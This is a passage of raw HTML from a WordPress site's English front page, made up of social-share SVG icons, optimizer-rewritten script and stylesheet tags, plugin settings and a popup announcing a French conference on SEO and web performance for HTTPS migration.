77.75 0 70.94 0 62.883c0-9.858 7.835-17.85 17.5-17.85 6.697 0 12.516 3.838 15.458 9.474 8.55-5.024 19.14-8.345 30.747-9.234zM50.688 110.27c4.91 2.005 11.294 3.188 19.312 3.188s14.4-1.183 19.312-3.187c3.106-1.267 5.08-2.608 6.084-3.633l-4.125-4.207c-.452.462-1.76 1.352-4.124 2.316-4.203 1.715-9.85 2.762-17.146 2.762-7.295 0-12.943-1.047-17.146-2.762-2.363-.964-3.672-1.854-4.125-2.316l-4.126 4.207c1.005 1.025 2.978 2.366 6.084 3.634zm-1.105-23.587c4.833 0 8.75-3.996 8.75-8.925 0-4.93-3.917-8.925-8.75-8.925-4.832 0-8.75 3.996-8.75 8.925 0 4.93 3.918 8.925 8.75 8.925zm40.834 0c4.832 0 8.75-3.996 8.75-8.925 0-4.93-3.918-8.925-8.75-8.925-4.833 0-8.75 3.996-8.75 8.925 0 4.93 3.917 8.925 8.75 8.925z"/></g></svg> <# } #> <# if ( 'linkedin' === key ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="140" height="140" viewBox="0 0 140 140" preserveAspectRatio="none" class="hustle-icon hustle-i_linkedin"><g fill="none" fill-rule="evenodd"><path fill="none" d="M0 0h140v140H0z"/><path class="hustle-icon-path" d="M29.368 140H.878V47.412h28.49V140zm0-125.406c0 8.106-5.667 14.597-14.77 14.597h-.17C5.668 29.19 0 22.7 0 14.595 0 6.31 5.837 0 14.77 0c8.93 0 14.428 6.31 14.598 14.594zM75.846 140H47.21s.413-84.283 0-93.146h28.633l-.206 12.383c4.11-6.446 11.512-15.916 28.376-15.916C124.58 43.32 140 56.823 140 85.837V140h-28.68V87.248c0-12.696-7.095-19.145-18.407-19.145-8.635 0-13.778 5.842-16.038 11.486-.826 2.012-1.03 4.835-1.03 7.658V140z"/></g></svg> <# } #> <# if ( 'vkontakte' === key ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="140" height="140" viewBox="0 0 140 140" preserveAspectRatio="none" class="hustle-icon hustle-i_vkontakte"><g fill="none" fill-rule="evenodd"><path fill="none" d="M0 0h140v140H0z"/><path class="hustle-icon-path" fill-rule="nonzero" d="M139.258 105.862c-.17-.378-.328-.69-.475-.942-2.43-4.52-7.07-10.067-13.922-16.644l-.217-.225c-3.256-3.137-5.225-5.196-6.05-6.25-1.51-2.01-1.847-4.042-1.022-6.102.584-1.556 2.772-4.842 6.56-9.864 1.995-2.66 3.573-4.794 4.74-6.4 8.406-11.55 12.05-18.928 10.933-22.14l-.434-.752c-.293-.452-1.046-.866-2.26-1.243-1.216-.378-2.77-.44-4.666-.19l-20.992.15c-.34-.124-.826-.112-1.46.04l-.947.225-.365.19-.29.226c-.243.15-.51.414-.802.79-.29.376-.533.816-.727 1.318-2.285 6.075-4.883 11.723-7.8 16.944-1.798 3.114-3.45 5.812-4.957 8.096-1.506 2.284-2.77 3.967-3.79 5.045-1.02 1.08-1.943 1.945-2.77 2.598-.827.655-1.458.93-1.894.83-.44-.1-.852-.2-1.242-.302-.68-.452-1.227-1.067-1.64-1.845-.413-.778-.692-1.757-.838-2.937-.145-1.18-.23-2.196-.255-3.05-.023-.853-.012-2.06.037-3.615.05-1.556.073-2.61.073-3.162 0-1.908.036-3.98.11-6.213.072-2.234.132-4.005.18-5.31.05-1.304.074-2.685.074-4.14 0-1.457-.087-2.6-.256-3.428-.168-.828-.425-1.63-.764-2.41-.34-.778-.84-1.38-1.494-1.807-.656-.427-1.47-.766-2.442-1.017-2.576-.603-5.856-.928-9.84-.98-9.04-.1-14.847.504-17.422 1.81-1.02.55-1.944 1.304-2.77 2.258-.875 1.106-.997 1.71-.365 1.808 2.916.45 4.98 1.53 6.195 3.237l.438.905c.34.653.68 1.808 1.02 3.464.34 1.657.56 3.49.657 5.496.242 3.666.242 6.804 0 9.414-.244 2.612-.473 4.644-.693 6.1-.22 1.456-.547 2.636-.984 3.54-.438.903-.73 1.456-.875 1.656-.146.2-.267.327-.364.377-.63.25-1.287.377-1.967.377-.68 0-1.507-.352-2.48-1.055-.97-.704-1.978-1.67-3.023-2.9-1.045-1.23-2.224-2.95-3.536-5.16-1.312-2.208-2.672-4.82-4.082-7.83l-1.166-2.185c-.73-1.406-1.724-3.452-2.988-6.138s-2.382-5.285-3.353-7.795c-.388-1.054-.972-1.857-1.75-2.41l-.364-.226c-.242-.2-.63-.413-1.165-.64-.535-.227-1.093-.39-1.677-.49l-19.972.15c-2.04 0-3.426.478-4.155 1.432l-.29.452c-.146.25-.22.653-.22 1.205 0 .553.146 1.23.438 2.033 2.915 7.08 6.086 13.907 9.512 20.484 3.425 6.577 6.402 11.875 8.928 15.89 2.527 4.016 5.103 7.807 7.727 11.37 2.624 3.566 4.36 5.85 5.21 6.854.852 1.005 1.52 1.757 2.007 2.26l1.822 1.806c1.166 1.205 2.88 2.65 5.14 4.33 2.26 1.683 4.76 3.34 7.507 4.972 2.747 1.63 5.942 2.96 9.587 3.99 3.644 1.03 7.19 1.443 10.642 1.244H76.9c1.7-.152 2.988-.704 3.863-1.657l.29-.377c.195-.3.378-.765.546-1.392.172-.626.257-1.317.257-2.07-.05-2.158.11-4.103.472-5.835.363-1.73.777-3.037 1.24-3.916.463-.88.985-1.62 1.566-2.22.583-.604.998-.968 1.242-1.094.242-.126.435-.212.58-.263 1.167-.402 2.54-.013 4.12 1.168 1.58 1.18 3.062 2.637 4.447 4.37 1.385 1.732 3.05 3.676 4.993 5.834 1.945 2.16 3.645 3.765 5.102 4.82l1.458.904c.973.603 2.236 1.156 3.792 1.658 1.552.5 2.912.627 4.08.376l18.66-.3c1.846 0 3.282-.316 4.3-.943 1.02-.628 1.628-1.32 1.823-2.072.195-.753.206-1.607.037-2.562-.173-.952-.343-1.618-.512-1.994z"/></g></svg> <# } #> <# if ( 'fivehundredpx' === key ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="140" height="140" viewBox="0 0 140 140" preserveAspectRatio="none" class="hustle-icon hustle-i_fivehundredpx"><g fill="none" fill-rule="evenodd"><path fill="none" d="M0 0h140v140H0z"/><path class="hustle-icon-path" d="M136.3,62.8c-4-6-9.8-8.9-17.1-9.3c-9-0.5-15.9,3.5-21.8,9.4c-1.6,1.6-3.1,3.3-4.7,5c-2.2-2.2-4.3-4.5-6.5-6.5 c-5.4-5-11.7-8.2-19.5-7.9c-8.8,0.3-15.3,4-19.2,11.6c-0.2,0.4-0.4,0.8-0.7,1.5c-3.1-5.6-7.5-9.3-13.9-10.3 c-6.1-1-11.9-0.2-17.1,4.5c0.6-3.6,1.2-6.7,1.8-9.8c0-0.1,0.1-0.2,0.1-0.3c0.8-4,0.8-4,5.2-4h22.7V36.2H8.7 C7.4,43.2,6,50.3,4.7,57.4C4,61,3.3,64.7,2.6,68.3c-0.1,0.6-0.2,1.3-0.3,2.1c3.9,0,7.7,0,11.4,0c0.3,0,0.7-0.4,1-0.6 c4.5-4.6,10.6-5.6,15.4-2.7c4.8,2.9,6.6,9.3,4.2,15c-3,7.3-12.7,9.4-18,3.8c-1.5-1.6-2.2-3.8-3.5-6H0c0.4,2,0.6,4.1,1.3,6 c2.6,7.3,8.4,11,16,12.7c1.1,0.3,2.2,0.5,3.4,0.7h7.8c1.8-0.5,3.7-0.9,5.4-1.6c5.8-2.2,10.1-6,12.9-11.5c0.2,0.3,0.5,0.6,0.6,0.8 c5.8,11.7,20.5,14.4,30.9,9.6c4.3-2,7.8-4.9,11-8.2c1-1.1,2.1-2.1,3-2.9c1.9,1.6,3.7,3.1,5.5,4.7c5.6,5,11.9,8.6,19.9,8.6 c11.5,0,20.2-7.1,22-17.9C140.6,74.5,140,68.3,136.3,62.8z M70.8,85.8c-3.9,1-7.7,0.7-10.6-2.3c-3-3-3.5-6.8-2.3-10.7 c1.9-6,7.4-8.5,13.5-6.2c5.3,2,9.2,5.8,13.2,9.8C80.8,80.6,76.6,84.3,70.8,85.8z M124.3,84.2c-3.3,2.8-7.3,2.6-11.2,1.4 c-4.3-1.3-9.4-5.1-12.6-9.2c3.3-3.3,6.4-6.7,10.6-8.8c3.9-2,8-2.6,11.9-0.1C128.8,70.8,129.4,80,124.3,84.2z"/></g></svg> <# } #> <# if ( 'houzz' === key ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="140" height="140" viewBox="0 0 140 140" preserveAspectRatio="none" class="hustle-icon hustle-i_houzz"><g fill="none" fill-rule="evenodd"><path fill="none" d="M0 0h140v140H0z"/><polygon class="hustle-icon-path" points="70,0 70,46.6 28,70 28,23.4 "/><polygon class="hustle-icon-path" points="70,93.3 28,116.6 28,70 "/><polygon class="hustle-icon-path" points="112,70 112,116.6 70,140 70,93.3 "/><polygon class="hustle-icon-path" points="112,23.4 112,70 70,46.6 "/></g></svg> <# } #> <# if ( 'instagram' === key ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="140" height="140" viewBox="0 0 140 140" preserveAspectRatio="none" class="hustle-icon hustle-i_instagram"><g fill="none" fill-rule="evenodd"><path fill="none" d="M0 0h140v140H0z"/><path class="hustle-icon-path" d="M139.9,49.1c-0.1-6.1-0.4-12.2-1.6-18.1c-2.7-14-11.1-23.6-24.7-28.2c-6.3-2.1-12.8-2.6-19.4-2.6C79.2,0,64.1,0,49.1,0 C43,0,36.8,0.2,30.9,1.5c-14,3.1-23.6,11.2-28.2,25c-2.1,6.2-2.6,12.7-2.6,19.1C0,60.7,0,75.8,0.1,90.9C0.1,97,0.2,103,1.5,109 c3.1,14,11.1,23.6,24.9,28.2c6.2,2.2,12.7,2.6,19.3,2.6c8.1,0.2,16.2,0.1,24.3,0.1v0.1c6.6,0,13.3,0.1,19.9-0.1 c6.4-0.1,12.9-0.1,19.2-1.5c13.9-3.1,23.5-11.3,28.2-25c2.1-6.2,2.5-12.7,2.6-19.2C140,79.2,140.1,64.1,139.9,49.1z M126.8,96.7 c-0.2,3.7-0.5,7.5-1.5,11c-2.5,10.6-9.6,16.5-20.1,18.3c-4.7,0.8-9.4,0.9-14.2,1c-12.2,0.2-24.4,0.2-36.6,0.2 c-5.9-0.1-11.9-0.3-17.7-0.9c-13.1-1.2-21.9-10-23.2-23c-0.5-5.4-0.7-10.8-0.8-16.3c-0.2-11.4-0.2-22.8,0-34.1 c0.2-6.5,0.3-12.9,1.5-19.2c2.2-11.8,10.5-19.1,22.6-20c8.4-0.6,16.8-0.8,25.2-0.9c8.5-0.1,16.9-0.1,25.3,0.1 c6.5,0.2,13,0,19.4,1.4c10.6,2.3,17.7,9.7,19.3,20.5c0.6,4.5,0.9,9.2,1,13.8c0.2,7.2,0,14.4,0,21.5h0.4 C127.2,78.9,127.1,87.8,126.8,96.7z"/><path class="hustle-icon-path" d="M115.8,32.7c0,4.7-3.8,8.5-8.5,8.5s-8.6-3.9-8.6-8.6c0-4.7,3.8-8.5,8.6-8.4C112.2,24.2,115.9,27.9,115.8,32.7z"/><path class="hustle-icon-path" d="M70.2,34C50.1,33.9,34,49.8,34,69.7C33.9,89.9,49.8,106,69.8,106C89.9,106,106,90,106,70.1S90,34,70.2,34z M70.1,93.2 C57.4,93.3,46.7,82.7,46.7,70S57.3,46.7,70,46.7c12.7,0,23.3,10.7,23.3,23.3C93.2,82.7,82.7,93.2,70.1,93.2z"/></g></svg> <# } #> <# if ( 'twitch' === key ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="140" height="140" viewBox="0 0 140 140" preserveAspectRatio="none" class="hustle-icon hustle-i_twitch"><g fill="none" fill-rule="evenodd"><path fill="none" d="M0 0h140v140H0z"/><path class="hustle-icon-path" /><path class="hustle-icon-path" d="M15.9,0c-0.6,0-0.8,0.2-1.1,0.7C11.4,9,7.9,17.2,4.4,25.5c-0.1,0.2-0.2,0.4-0.3,0.6v95.4h32.1c0.2,0,0.6,0,0.8,0.1V140 h17.7c0.4,0,0.7-0.2,1-0.4c5.8-5.8,11.6-11.7,17.5-17.6c0.3-0.3,0.7-0.4,1.1-0.4h24.2c0.6,0,0.9-0.2,1.3-0.5 c11.9-12,23.7-23.9,35.6-35.8c0.2-0.2,0.3-0.2,0.5-0.4V0H15.9z M121.3,76.8c0,0.4-0.2,0.7-0.5,1.1c-5.8,5.8-11.6,11.8-17.5,17.6 c-0.2,0.3-0.6,0.4-1.1,0.4H70.7c-0.5,0-0.8,0.2-1.2,0.5c-5.8,5.8-11.5,11.6-17.3,17.5c-0.2,0.1-0.3,0.2-0.6,0.5V95.9 c-0.3-0.1-0.6-0.1-0.8-0.1H30.5c-0.8,0-0.8,0-0.8-0.7V14.7h91.7V76.8z"/><rect class="hustle-icon-path" x="81" y="36.9" width="18.1" height="36.7"/><rect class="hustle-icon-path" x="51.8" y="36.9" width="18.1" height="36.7"/></g></svg> <# } #> <# if ( 'youtube' === key ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="140" height="140" viewBox="0 0 140 140" preserveAspectRatio="none" class="hustle-icon hustle-i_youtube"><g fill="none" fill-rule="evenodd"><path fill="none" d="M0 0h140v140H0z"/><path class="hustle-icon-path" d="M50.6,45.4v47.3c16.4-7.8,31.8-15.5,48-23.3C83.1,61.1,66.9,53.2,50.6,45.4 M56.9,23.8h25.5 c0.9,0,1.5,0,2.4,0c5.5,0,11.6,0,17,0.9c2.4,0,5.5,0,7.8,0c3.9,0,7,0.9,10.9,0.9c1.5,0,3.9,0.9,5.5,0.9c6.1,3.1,10,7,11.6,13.1 c0.9,3.9,1.5,7.8,1.5,11.6c0.9,4.6,0.9,9.4,0.9,13.1v15.5c0,0,0,0,0,0.9c0,6.1-0.9,12.4-1.5,17.9c-0.9,2.4-0.9,4.6-2.4,6.1 c-3.1,5.5-7.8,9.4-14.8,10c-3.1,0.9-7,0.9-10,0.9c-4.6,0-9.4,0.9-13.1,0.9c-4.6,0-10,0-14.8,0c0,0,0,0-0.9,0H57.6c0,0,0,0-0.9,0 c-4.6,0-9.4,0-14.8,0c-3.9,0-7.8,0-11.6-0.9c-3.9,0-7-0.9-10.9-0.9c-1.5,0-3.9,0-5.5-0.9c-6.1-1.5-10-5.5-11.6-11.6 C1.5,99,0.9,96,0,92.7c0.9-3.1,0-7,0-10.9c0-8.5,0-17,0-25.5c0-5.5,0.9-10.9,2.4-16.4c1.5-7,7-12.4,14.8-14 c2.4-0.9,4.6-0.9,7.8-0.9c3.9,0,7.8-0.9,12.4-0.9C43.6,23.8,50.6,23.8,56.9,23.8"/></g></svg> <# } #> <# if ( 'telegram' === key ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="140" height="140" viewBox="0 0 140 140" preserveAspectRatio="none" class="hustle-icon hustle-i_telegram"><g fill="none" fill-rule="evenodd"><path fill="none" d="M0 0h140v140H0z"/> <path class="hustle-icon-path" style="fill-opacity: 0.5;" d="M112.8,37.2c-2.5,2.3-55.4,49.5-56.3,50.2c-0.9,0.7-0.9,1.8,0,2.5c0.3,0.2,8.4,6.1,18,13 c-4.8,4.8-12.6,12.2-15.9,15.3c-4.4,4-8.7,3.5-9.6,0.7c-1.6-5-12-38.6-12-38.6s1.2-0.7,3.3-2.1c11.8-7.3,52.1-32.3,65-40.5 c1.6-1,2.8-1.7,3.5-2.1c0.2-0.2,0.4-0.3,0.5-0.3c1.3-0.9,2.4-1.4,3.2-1.6c0.2-0.2,0.3-0.2,0.4-0.2c0.3-0.1,0.6-0.1,0.8-0.1h0.1 c0.1,0,0.2,0,0.4,0c0.3,0,0.5,0.1,0.6,0.2C115.3,34.1,115.3,35,112.8,37.2z"/> <path class="hustle-icon-path" d="M139.4,23.5c-1.2,5.9-19.4,91.3-21.1,97.8c-1.6,6.5-7.6,8.1-13.3,3.8c-3.3-2.5-18.2-13.3-30.6-22.3 c-9.6-6.9-17.6-12.8-18-13c-0.9-0.7-0.9-1.8,0-2.5s53.9-47.9,56.3-50.2c2.6-2.2,2.6-3.1,1.9-3.5c-0.1-0.1-0.4-0.2-0.6-0.2 c-0.1,0-0.2,0-0.4,0h-0.1c-0.3,0-0.5,0-0.8,0.1c-0.2,0-0.2,0-0.4,0.2c-0.8,0.2-1.9,0.7-3.2,1.6c-0.1,0.1-0.3,0.2-0.5,0.3 c-0.7,0.4-1.8,1.1-3.5,2.1c-12.9,8.2-53.2,33.1-65,40.5c-2.1,1.3-3.3,2.1-3.3,2.1s-23-7.7-32.7-10.7c-8.8-2.6-1.3-7.7,2.6-9.2 c3.9-1.6,118.7-45.2,122.8-46.7C139.9,9.8,141,16.1,139.4,23.5z"/> </g></svg> <# } #> </div> <# if ( 'native' === service_type ) { if ( 'click' === click_counter ) { #> <div class="hustle-shares-counter"><span>{{ icon.counter }}</span></div> <# } else if ( 'native' === click_counter && _.isFalse( _.isUndefined( icon.native_counter ) ) && icon.native_counter !== 0 ) { #> <div class="hustle-shares-counter"><span>{{ icon.native_counter }}</span></div> <# } else if ( false ) { #> <div class="hustle-shares-counter"><span>9</span></div> <# } } #> </a> <# } ); } #> </div> </div> <# } #> </div> </script> <link rel="stylesheet" media="all" href="https://www.fasterize.com/fstrz/f12007af17e4124b9cf42c1d67a2b7442f59a306cff1328e0bd3986d18afc0d8.css?src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fplugins%2Flivemesh-siteorigin-widgets-pro%2Fassets%2Fcss%2Fflexslider.css%3Ffrz-v%3D454&amp;src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fplugins%2Flivemesh-siteorigin-widgets-pro%2Fincludes%2Fwidgets%2Flsow-testimonials-slider-widget%2Fcss%2Fstyle.css%3Ffrz-v%3D454&amp;src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fplugins%2Faddon-so-widgets-bundle%2Fcss%2Fowl.carousel.css%3Ffrz-v%3D454&amp;src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fplugins%2Faddon-so-widgets-bundle%2Fcss%2Fwidgets.css%3Ffrz-v%3D454" /> <link rel="stylesheet" media="all" href="https://www.fasterize.com/fstrz/dc57c13e43718ce3731ff704b7ced10d6c1a4340a254dd6f5efd88d1ddb4bd48.css?src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fplugins%2Fslickquiz%2Fslickquiz%2Fcss%2FslickQuiz.css%3Ffrz-v%3D454&amp;src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fplugins%2Fslickquiz%2Fcss%2Ffront.css%3Ffrz-v%3D454" /> <link rel='stylesheet' id='hstl-roboto-css' href='https://fonts.googleapis.com/css?family=Roboto+Condensed%3A300%2C300i%2C400%2C400i%2C700%2C700i%7CRoboto%3A300%2C300i%2C400%2C400i%2C500%2C500i%2C700%2C700i&amp;ver=5.1.1' type='text/css' media='all'> <link rel='stylesheet' id='hstl-opensans-css' href='https://fonts.googleapis.com/css?family=Open+Sans%3A400%2C400i%2C700%2C700i&amp;ver=5.1.1' type='text/css' media='all'> <link rel='stylesheet' id='hstl-source-code-pro-css' href='https://fonts.googleapis.com/css?family=Source+Code+Pro&amp;ver=5.1.1' type='text/css' media='all'> <link rel="stylesheet" media="all" href="https://www.fasterize.com/fstrz/19a7a5b01ec386b6e967571964b2f5e3fa083c13076b022e7780ca29898d70f3.css?src=https%3A%2F%2Fwww.fasterize.com%2Fwp-includes%2Fcss%2Fdashicons.min.css%3Ffrz-v%3D454&amp;src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fplugins%2Fwordpress-popup%2Fassets%2Fcss%2Ffront.min.css%3Ffrz-v%3D454" /> <script type='text/frzjs' orig_index="10"> /* <![CDATA[ */ var wpcf7 = {"apiSettings":{"root":"https:\/\/www.fasterize.com\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"},"recaptcha":{"messages":{"empty":"Please verify that you are not a robot."}},"cached":"1"}; /* ]]> */ </script> <script type="text/frzjs" frz_orig_src="https://www.fasterize.com/fstrz/97d692b39c752134eee64a2d01f51d422e2366ffd1d4e09a98bc736485e8dfe8.js?src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fplugins%2Fcontact-form-7%2Fincludes%2Fjs%2Fscripts.js%3Ffrz-v%3D454&amp;src=https%3A%2F%2Fwww.fasterize.com%2Fwp-includes%2Fjs%2Fjquery%2Fjquery.form.min.js%3Ffrz-v%3D454&amp;src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fplugins%2Fbootstrap-for-contact-form-7%2Fassets%2Fdist%2Fjs%2Fscripts.min.js%3Ffrz-v%3D454&amp;src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fplugins%2Flivemesh-siteorigin-widgets-pro%2Fassets%2Fjs%2Fmodernizr-custom.min.js%3Ffrz-v%3D454" orig_index="11"></script> <script type='text/frzjs' frz_orig_src="https://www.fasterize.com/wp-content/plugins/livemesh-siteorigin-widgets-pro/assets/js/jquery.waypoints.min.js?frz-v=454" orig_index="12"></script> <script type='text/frzjs' orig_index="13"> /* <![CDATA[ */ var lsow_settings = {"mobile_width":"780","custom_css":""}; /* ]]> */ </script> <script type="text/frzjs" frz_orig_src="https://www.fasterize.com/fstrz/d7607132eb13d897058de8eda7df2c8433eda8edbc584c0a9150e0ffb9fb0d7b.js?src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fplugins%2Flivemesh-siteorigin-widgets-pro%2Fassets%2Fjs%2Flsow-frontend.min.js%3Ffrz-v%3D454&amp;src=https%3A%2F%2Fwww.fasterize.com%2Fwp-includes%2Fjs%2Funderscore.min.js%3Ffrz-v%3D454" orig_index="14"></script> <script type='text/frzjs' orig_index="15"> /* <![CDATA[ */ var Modules = [{"content":{"module_name":"Ecommerce 2017","has_title":true,"title":"[Conf\u00e9rence] Les conseils SEO et Webperf pour passer au full HTTPS","sub_title":"Rendez-vous Mardi 19 sept. - 15h00 \u00e0 16h00 - Salle 2 ","main_content":"<p>Comment pr\u00e9server vos performances SEO et Webperf lors de votre migration en HTTPS ? Nous partagerons avec vous les t\u00e9moignages de nos clients, les obstacles qu'ils ont rencontr\u00e9s et les r\u00e9ponses qu'ils y ont apport\u00e9es.<\/p>","use_feature_image":true,"feature_image":"http:\/\/www.fasterize.com\/wp-content\/uploads\/2017\/09\/parisretailweek-twitter.png","feature_image_location":"left","feature_image_hide_on_mobile":"1","show_cta":true,"show_gdpr":0,"cta_label":"Notez-le dans votre agenda","cta_url":"http:\/\/tinyurl.com\/y6vgc5va ","cta_target":"blank","use_email_collection":0,"save_local_list":0,"local_list_name":"","active_email_service":"","form_elements":"","after_successful_submission":"show_success","success_message":"","gdpr_message":"Yes, I agree with the <a href=\"\">privacy policy<\/a>.","auto_close_success_message":0,"auto_close_time":5,"auto_close_unit":"seconds","redirect_url":""},"design":{"form_layout":"one","feature_image_position":"left","feature_image_fit":"cover","feature_image_horizontal":"center","feature_image_horizontal_px":"-100","feature_image_vertical":"center","feature_image_vertical_px":"-100","style":"simple","customize_colors":"1","main_bg_color":"#ffffff","image_container_bg":"rgba(53,65,74,1)","form_area_bg":"rgba(93,115,128,1)","title_color":"#333333","subtitle_color":"#333333","content_color":"rgba(173,181,183,1)","link_static_color":"#164a6e","link_hover_color":"#164a6e","link_active_color":"#164a6e","cta_button_static_bg":"#164a6e","cta_button_hover_bg":"#164a6e","cta_button_active_bg":"#164a6e","cta_button_static_color":"rgba(255,255,255,1)","cta_button_hover_color":"rgba(255,255,255,1)","cta_button_active_color":"rgba(255,255,255,1)","gdpr_content":"#ADB5B7","gdpr_chechbox_background_static":"#FDFDFD","gdpr_checkbox_background_active":"#FDFDFD","gdpr_checkbox_icon":"#38C5B5","optin_input_static_bg":"rgba(253,253,253,1)","optin_input_hover_bg":"rgba(253,253,253,1)","optin_input_active_bg":"rgba(253,253,253,1)","optin_input_icon":"rgba(173,181,183,1)","optin_placeholder_color":"rgba(173,181,183,1)","optin_form_field_text_static_color":"rgba(54,59,63,1)","optin_form_field_text_hover_color":"rgba(54,59,63,1)","optin_form_field_text_active_color":"rgba(54,59,63,1)","optin_submit_button_static_bg":"rgba(56,197,181,1)","optin_submit_button_hover_bg":"rgba(73,226,209,1)","optin_submit_button_active_bg":"rgba(73,226,209,1)","optin_submit_button_static_color":"rgba(253,253,253,1)","optin_submit_button_hover_color":"rgba(253,253,253,1)","optin_submit_button_active_color":"rgba(253,253,253,1)","optin_error_text_color":"#F1F1F1","optin_error_text_bg":"#EA6464","optin_mailchimp_title_color":"rgba(253,253,253,1)","optin_mailchimp_labels_color":"rgba(173,181,183,1)","optin_check_radio_bg":"rgba(253,253,253,1)","optin_check_radio_tick_color":"rgba(56,197,181,1)","optin_success_tick_color":"rgba(56,197,181,1)","optin_success_content_color":"rgba(253,253,253,1)","overlay_bg":"rgba(51,51,51,0.9)","close_button_static_color":"rgba(56,197,181,1)","close_button_hover_color":"rgba(73,226,209,1)","close_button_active_color":"rgba(73,226,209,1)","border":"1","border_radius":"5","border_weight":"3","border_type":"solid","border_color":"rgba(218,218,218,1)","gdpr_border":0,"gdpr_border_radius":5,"gdpr_border_weight":3,"gdpr_border_type":"solid","gdpr_border_color":"rgba(218,218,218,1)","drop_shadow":"false","drop_shadow_x":"0","drop_shadow_y":"0","drop_shadow_blur":"0","drop_shadow_spread":"0","drop_shadow_color":"rgba(0,0,0,0)","customize_size":"0","custom_height":"250","custom_width":"800","form_fields_border":0,"form_fields_border_radius":5,"form_fields_border_weight":3,"form_fields_border_type":"solid","form_fields_border_color":"rgba(218,218,218,1)","form_fields_icon":"static","form_fields_proximity":"joined","button_border":0,"button_border_radius":5,"button_border_weight":3,"button_border_type":"solid","button_border_color":"rgba(218,218,218,1)","customize_css":"0","custom_css":""},"settings":{"animation_in":"no_animation","animation_out":"no_animation","after_close":"keep_show","expiration":365,"expiration_unit":"days","allow_scroll_page":0,"not_close_on_background_click":0,"on_submit":"default","after_content_enabled":"false","widget_enabled":"true","shortcode_enabled":"true","conditions":""},"tracking_types":null,"test_types":null,"module_id":"14","blog_id":"1","module_name":"Ecommerce 2017","module_type":"embedded","active":"1","test_mode":"0"}]; var inc_opt = {"ajaxurl":"https:\/\/www.fasterize.com\/wp-admin\/admin-ajax.php","page_id":"776","page_type":"front","current_url":"https:\/\/www.fasterize.com\/en","is_admin":"0","is_upfront":"","is_caldera_active":"","adblock_detector_js":"https:\/\/www.fasterize.com\/wp-content\/plugins\/wordpress-popup\/assets\/js\/ads.js","l10n":{"never_see_again":"Never see this message again","success":"Congratulations! You have been subscribed to {name}","submit_failure":"Something went wrong, please try again.","test_cant_submit":"Form can't be submitted in test mode."},"recaptcha":{"enabled":"0","sitekey":"","secret":""}}; var hustle_vars = {"ajaxurl":"https:\/\/www.fasterize.com\/wp-admin\/admin-ajax.php","page_id":"776","page_type":"front","current_url":"https:\/\/www.fasterize.com\/en","is_admin":"0","is_upfront":"","is_caldera_active":"","adblock_detector_js":"https:\/\/www.fasterize.com\/wp-content\/plugins\/wordpress-popup\/assets\/js\/ads.js","l10n":{"never_see_again":"Never see this message again","success":"Congratulations! You have been subscribed to {name}","submit_failure":"Something went wrong, please try again.","test_cant_submit":"Form can't be submitted in test mode."},"recaptcha":{"enabled":"0","sitekey":"","secret":""}}; /* ]]> */ </script> <script type="text/frzjs" frz_orig_src="https://www.fasterize.com/fstrz/7ff53dc693df6d8741b72cbf67ec95e4293bd78475fd7ad40bfb05451733f990.js?src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fplugins%2Fwordpress-popup%2Fassets%2Fjs%2Ffront.min.js%3Ffrz-v%3D454&amp;src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fplugins%2Fwp-syntax%2Fjs%2Fwp-syntax.js%3Ffrz-v%3D454&amp;src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fthemes%2Ffasterize%2Fjs%2Fnavigation.js%3Ffrz-v%3D454&amp;src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fthemes%2Ffasterize%2Fjs%2Fskip-link-focus-fix.js%3Ffrz-v%3D454" orig_index="16"></script> <script type="text/frzjs" frz_orig_src="https://www.fasterize.com/fstrz/4dc37e8549e1f70ae557a319d3ce9ddf415a421325aac46f5e823007c0891450.js?src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fthemes%2Ffasterize%2Fjs%2Fbootstrap.js%3Ffrz-v%3D454&amp;src=https%3A%2F%2Fwww.fasterize.com%2Fwp-includes%2Fjs%2Fwp-embed.min.js%3Ffrz-v%3D454&amp;src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fplugins%2Flivemesh-siteorigin-widgets-pro%2Fassets%2Fjs%2Fjquery.flexslider.min.js%3Ffrz-v%3D454&amp;src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fplugins%2Flivemesh-siteorigin-widgets-pro%2Fincludes%2Fwidgets%2Flsow-testimonials-slider-widget%2Fjs%2Ftestimonials.min.js%3Ffrz-v%3D454" orig_index="17"></script> <script type="text/frzjs" frz_orig_src="https://www.fasterize.com/fstrz/67be4050289c3d73fb3255dd045fd72b2ca1e2972fcec4fa73ad330045574b93.js?src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fplugins%2Faddon-so-widgets-bundle%2Fjs%2Fowl.carousel.min.js%3Ffrz-v%3D454&amp;src=https%3A%2F%2Fwww.fasterize.com%2Fwp-content%2Fplugins%2Fslickquiz%2Fslickquiz%2Fjs%2FslickQuiz.js%3Ffrz-v%3D454" orig_index="18"></script> <script type="text/frzjs" orig_index="19">(function() { var expirationDate = new Date(); expirationDate.setTime( expirationDate.getTime() + 31536000 * 1000 ); document.cookie = "pll_language=en; expires=" + expirationDate.toUTCString() + "; path=/"; }());</script><script type="text/frzjs" orig_index="20">document.body.className = document.body.className.replace("siteorigin-panels-before-js","");</script> <link rel="stylesheet" type="text/css" 